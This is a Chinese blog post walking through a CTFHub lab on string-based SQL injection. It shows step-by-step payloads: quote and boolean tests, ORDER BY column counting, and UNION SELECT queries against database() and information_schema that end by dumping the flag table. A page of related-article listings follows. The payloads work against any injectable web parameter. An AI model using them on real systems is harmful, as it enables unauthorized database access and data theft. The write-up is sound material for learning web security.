CTFHUB-WEB-字符型SQL注入

最新推荐文章于 2024-06-12 17:05:56 发布
最新推荐文章于 2024-06-12 17:05:56 发布
阅读量330 收藏 4
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/111628284
版权

CTFHUB-WEB-字符型SQL注入

我们先就这此题来了解下如何去判断是否是字符串注入
如何去判断
1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’
,加入单引号会引起报错,页面不回返

id=1'

在这里插入图片描述2.加入

?id=1' and 1=1

在这里插入图片描述这里就需要加注释来进行绕过
一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+

id=1' and 1=1--+

在这里插入图片描述3.输入

id=1' and 1=2--+

发现页面再次报错,这个时候就可以确认是字符型注入了
解题思路:
首先查询字段

id=1' order by 1--+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述当参数为3时报错,说明字段数为2
使用union联合查询查看注入点

id=1' union select 1,2--+

在这里插入图片描述我们发现注入成功却只返回了一条信息,是因为这里页面只能显示一条信息,这里我们将1改为-1进行注入,就可以返回我们需要知道的信息点

id=-1' union select 1,2--+

在这里插入图片描述我们可以得知要查询的信息放在了第二个列处
查询当前数据库名

?id=-1' union select 1,database()--+

在这里插入图片描述

id=-1' union select table_schema,group_concat(table_name) from information_schema.tables where table_schema='sqli' --+

查询数据库sqli中的表名
在这里插入图片描述

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

获取所有字段名
在这里插入图片描述查询数据库指定表的列的内容

union select 1,group_concat(flag) from sqli.flag --+

在这里插入图片描述

一名无聊的网友
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1043
CTFHUB-WEB-SQL注入
CTFHUB-web-SQL注入
ookami6497的博客
11-29 787
CTFHUB SQL
CTFHub字符注入
sGanYu
07-24 3120
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
CTFHub - 字符注入
Have_a_great_day的博客
09-08 479
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub:web前置技能-SQL注入-字符注入
最新发布
wdnmddbl的博客
06-12 1111
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:字符注入点网页链接有类似的结构。
CTFHUB——字符注入
陈艺秋的博客
01-14 441
sql整数注入
CTFHub 字符SQL注入
Leon~博客
03-14 3983
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2592
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)中所有的字段名 limit 一个.
ctfhub web全部做题记录(持续跟新)
01-08
分为整数字符注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件上传功能可被利用来上传恶意文件,如PHP后门。通过修改文件头,绕过前端验证...
86-web漏洞挖掘之SQL注入1
08-03
SQL注入攻击是网络安全领域中一种常见的攻击手段,主要针对Web应用程序,通过构造恶意的SQL语句,使攻击者能够获取、修改、删除数据库中的敏感信息,甚至控制整个数据库服务器。在本篇文章中,我们将深入探讨SQL注入...
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
php登录页面实现-SQL注入
03-07
- 输入验证:通过`htmlspecialchars()`或`strip_tags()`等函数清理用户输入,避免HTML或SQL特殊字符注入。 - 错误处理:避免在错误消息中泄露过多的数据库信息,可以使用自定义错误消息或者配置数据库连接为显示...
CTFHUB - SQL注入-整数字符注入
m0_64180167的博客
11-28 2340
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1523
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 2027
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHub技能树-Web-SQL注入
qq_54037445的博客
11-28 337
CTFHub技能树-Web-SQL注入 cookie注入、UA注入、refer注入
CTFHub | webSQL注入(整数注入
2301_76435948的博客
09-23 237
拿到flag。
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 812
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值